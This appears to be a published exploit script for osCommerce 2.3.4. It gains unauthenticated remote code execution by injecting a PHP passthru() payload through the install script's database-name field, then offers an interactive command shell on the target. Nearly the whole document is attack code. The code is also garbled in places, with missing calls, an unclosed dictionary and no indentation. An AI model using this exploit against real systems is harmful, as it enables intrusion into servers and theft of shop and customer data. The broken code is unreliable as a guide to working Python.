Authored by Bryan Leong

osCommerce version remote code execution exploit. This is a variant of the original discovery of code execution in this version by Simon Scannell in March of 2018.

# Exploit Title: osCommerce - Remote Code Execution (2)
# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin
# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage:
# Version: osCommerce 2.3.4
# Tested on: Windows

import requests
import sys

if(len(sys.argv) != 2):
print("please specify the osCommerce url")
print("format: python3 <url>")
print("eg: python3 http://localhost/oscommerce-2.3.4/catalog")

baseUrl = sys.argv[1]
testVulnUrl = baseUrl + '/install/install.php'

def rce(command):
#targeting the finish step which is step 4
targetUrl = baseUrl + '/install/install.php?step=4'

payload = "');"
payload += "passthru('" + command + "');" # injecting system command here
payload += "/*"

#injecting parameter
data = {
'DB_DATABASE' : payload

response =, data=data)

if(response.status_code == 200):
#print('[*] Successfully injected payload to config file')

readCMDUrl = baseUrl + '/install/includes/configure.php'
cmd = requests.get(readCMDUrl)

commandRsl = cmd.text.split('n')

if(cmd.status_code == 200):
#print('[*] System Command Execution Completed')
#removing the error message above
for i in range(2, len(commandRsl)):
return '[!] Configure.php not found'

return '[!] Fail to inject payload'

#testing vulnerability accessing the directory
test = requests.get(testVulnUrl)

#checking the install directory still exist or able to access or not
if(test.status_code == 200):
print('[*] Install directory still available, the host likely vulnerable to the exploit.')

#testing system command injection
print('[*] Testing injecting system command to test vulnerability')
cmd = 'whoami'

print('User: ', end='')
err = rce(cmd)

if(err != None):

cmd = input('RCE_SHELL$ ')
err = rce(cmd)

if(err != None):

print('[!] Install directory not found, the host is not vulnerable')